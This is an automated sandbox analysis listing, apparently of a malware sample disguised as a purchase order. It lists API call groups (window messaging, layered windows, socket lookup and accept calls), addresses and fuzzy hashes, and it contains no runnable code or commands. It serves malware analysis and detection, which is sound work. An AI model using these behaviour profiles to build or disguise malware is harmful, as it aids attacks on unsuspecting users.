                                  • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                  • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                  APIs
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                  • TranslateMessage.USER32(?), ref: 00442B01
                                  • DispatchMessageW.USER32(?), ref: 00442B0B
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchTranslate
                                  • String ID:
                                  • API String ID: 1795658109-0
                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                  APIs
                                  • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                  • GetCaretPos.USER32(?), ref: 004743B2
                                  • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                  • GetForegroundWindow.USER32 ref: 004743EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                  • String ID:
                                  • API String ID: 2759813231-0
                                  • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                  • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                  • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                  • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                  APIs
                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                  • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                  • _wcslen.LIBCMT ref: 00449519
                                  • _wcslen.LIBCMT ref: 00449526
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend_wcslen$_wcspbrk
                                  • String ID:
                                  • API String ID: 2886238975-0
                                  • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                  • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                  • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                  • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __setmode$DebugOutputString_fprintf
                                  • String ID:
                                  • API String ID: 1792727568-0
                                  • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                  • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                  • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                  • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                  APIs
                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                  • 742845F0.USER32(?,000000EC,?,00000001), ref: 0047A2DF
                                  • 742859E0.USER32(?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A2FA
                                  • 742859E0.USER32(?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A312
                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 742859Window$742845AttributesLayered
                                  • String ID:
                                  • API String ID: 4121519411-0
                                  • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                  • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                  • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                  • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                  APIs
                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: lstrcmpilstrcpylstrlen$_malloc
                                  • String ID: cdecl
                                  • API String ID: 3850814276-3896280584
                                  • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                  • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                  APIs
                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                  • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                  • _memmove.LIBCMT ref: 0046D475
                                  • inet_ntoa.WSOCK32(?), ref: 0046D481
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                  • String ID:
                                  • API String ID: 2502553879-0
                                  • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                  • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                  • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                  • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                  APIs
                                  • SendMessageW.USER32 ref: 00448C69
                                  • 742845F0.USER32(?,000000EC), ref: 00448C91
                                  • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                  • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$742845
                                  • String ID:
                                  • API String ID: 1730662999-0
                                  • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                  • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                  • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                  • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                  APIs
                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorLastacceptselect
                                  • String ID:
                                  • API String ID: 385091864-0
                                  • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                  • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                  • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                  • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                  APIs
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                  • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                  • GetStockObject.GDI32(00000011), ref: 00430258
                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                  • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$CreateMessageObjectSendShowStock
                                  • String ID:
                                  • API String ID: 1358664141-0
                                  • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                  • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                  • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                  • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 2880819207-0
                                  • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                  • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 00430BA2
                                  • ScreenToClient.USER32(?,?), ref: 00430BC1
                                  • ScreenToClient.USER32(?,?), ref: 00430BE2
                                  • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ClientRectScreen$InvalidateWindow
                                  • String ID:
                                  • API String ID: 357397906-0
                                  • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                  • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                  APIs
                                  • __wsplitpath.LIBCMT ref: 0043392E
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • __wsplitpath.LIBCMT ref: 00433950
                                  • __wcsicoll.LIBCMT ref: 00433974
                                  • __wcsicoll.LIBCMT ref: 0043398A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                  • String ID:
                                  • API String ID: 1187119602-0
                                  • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                  • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$_malloc_wcscat_wcscpy
                                  • String ID:
                                  • API String ID: 1597257046-0
                                  • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                  • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                  • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                  • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                  • __malloc_crt.LIBCMT ref: 0041F5B6
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
